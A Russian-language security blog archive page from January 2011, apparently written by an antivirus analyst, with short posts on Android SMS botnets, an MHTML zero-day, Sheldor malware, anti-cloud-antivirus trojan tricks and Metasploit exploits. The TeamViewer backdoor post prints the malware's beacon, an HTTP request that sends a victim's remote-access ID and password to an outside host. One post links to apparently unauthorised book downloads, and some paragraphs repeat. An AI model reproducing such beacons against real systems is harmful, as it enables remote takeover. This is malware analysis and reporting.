На конференции Shmoocon'2011 был представлен интересный подход к построению мобильного ботнета с возможностью управления через SMS на телефонах на базе Android.
Слайды презентации
Видео с демонстрацией работы:
понедельник, 31 января 2011 г.
суббота, 29 января 2011 г.
Уязвимость в обработке MHTML протокола (CVE-2011-0096)
Около двух недель назад появилась интересная информация "Hacking with mhtml protocol handler". Как оказалось очередной 0-дей в обработке MHTML, на этот раз уязвимость кроется в обработке MIME-formatted запросов. При определенных условиях злоумышленник может внедрить js-код, который выполниться на клиентской стороне. Последствия могут быть разные, например похищение аутентификационных данных для популярных сервисов или банальный XSS. Работает уязвимость только на IE, но зато для всех версий и видне начиная с ХР и выше.
Ярлыки:
0-day,
Exploits,
IE,
Javascript
понедельник, 24 января 2011 г.
Win32/Sheldor - теперь малиновый ...
Недавно уже писал про семейство Win32/Sheldor и вот на днях граждане порадовали другой версией Win32/Sheldor.E (VT) с двумя интересными командами:
пятница, 21 января 2011 г.
Атака на антивирусные облака
На днях у себя в блоге MS опубликовала заметку о китайском троянце, который использует техники противодействия облачным антивирусным технологиям. С точки зрения приманки для журналистов все сработало, ибо заявление достаточно интересное, но на самом деле сей троянец достаточно прост и никаких инноваций в себе не несет.
Итак, способы противодействия облакам:
- при установке в файлы добавляются блоки случайного разного размера содержащие случайные данные, видимо для того, чтобы хешики сбивать.
Итак, способы противодействия облакам:
- при установке в файлы добавляются блоки случайного разного размера содержащие случайные данные, видимо для того, чтобы хешики сбивать.
Ярлыки:
Antivirus,
Malware,
Reflections
среда, 19 января 2011 г.
Эксплойт для MS10-073 таки попал на паблик
Сегодня на Metasploit появился эксплойт для повышения привилегий до SYSTEM, через эксплуатацию уязвимости в неправильной обработки keyboard layout (win32k.sys). MS10-073 известен тем, что применялся червем Stuxnet для повышения привилегий на системах Win2000/WinXP и уже много где достаточно подробно разобран (анализ от vupen).
В Canvas эксплойт для этой уязвимости попал примерно за месяц до выхода патча, но публичного эксплойта так никто и не сочинил. Возможно по причине того, что эксплойт не универсален и работает только на Win2000/WinXP. Появление этого эксплойта в Metasploit связано с PoC, который разработал Ruben Santamarta aka reversemode и положил на паблик на прошлой неделе.
А вот уязвимость с переполнением стека при обработке SystemDefaultEUDCFont (CVE-2010-4398) по прежнему не закрыта, а ведь прошло у больше двух месяцев.
В Canvas эксплойт для этой уязвимости попал примерно за месяц до выхода патча, но публичного эксплойта так никто и не сочинил. Возможно по причине того, что эксплойт не универсален и работает только на Win2000/WinXP. Появление этого эксплойта в Metasploit связано с PoC, который разработал Ruben Santamarta aka reversemode и положил на паблик на прошлой неделе.
А вот уязвимость с переполнением стека при обработке SystemDefaultEUDCFont (CVE-2010-4398) по прежнему не закрыта, а ведь прошло у больше двух месяцев.
Ярлыки:
Exploits,
Metasploit,
Stuxnet
понедельник, 17 января 2011 г.
Чтиво для вирусного аналитика
Как то я уже писал о книге Malware Analyst's Cookbook Если кому надо, то вот:
http://depositfiles.com/files/3tgmhz81h
А здесь все исходные тексты из книги: http://code.google.com/p/malwarecookbook
Еще недавно приобрел неплохую книжицу "A Guide to Kernel Exploitation: Attacking the Core", но в интернетах водится ее электронная версия:
http://depositfiles.com/files/a5v5r0xkh
http://depositfiles.com/files/3tgmhz81h
А здесь все исходные тексты из книги: http://code.google.com/p/malwarecookbook
Еще недавно приобрел неплохую книжицу "A Guide to Kernel Exploitation: Attacking the Core", но в интернетах водится ее электронная версия:
http://depositfiles.com/files/a5v5r0xkh
Ярлыки:
Books
суббота, 15 января 2011 г.
TeamViewer, как компонент бэкдора
Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.
GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1
User-Agent: x3
Host: goeiuyi.net
Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD (VT).
вторник, 11 января 2011 г.
0-day для Graphics Rendering Engine
Интересный эксплойт появился на метасплойте в начале января для CVE-2010-3970. Началось все с двух товарищей Moti Joseph & Xu Hao, которые поведали миру о переполнении стека при отображении thumbnails файлов на конференции POC2010 в середине декабря (слайды).
Ярлыки:
0-day,
Exploits,
Metasploit,
Video
Подписаться на:
Сообщения (Atom)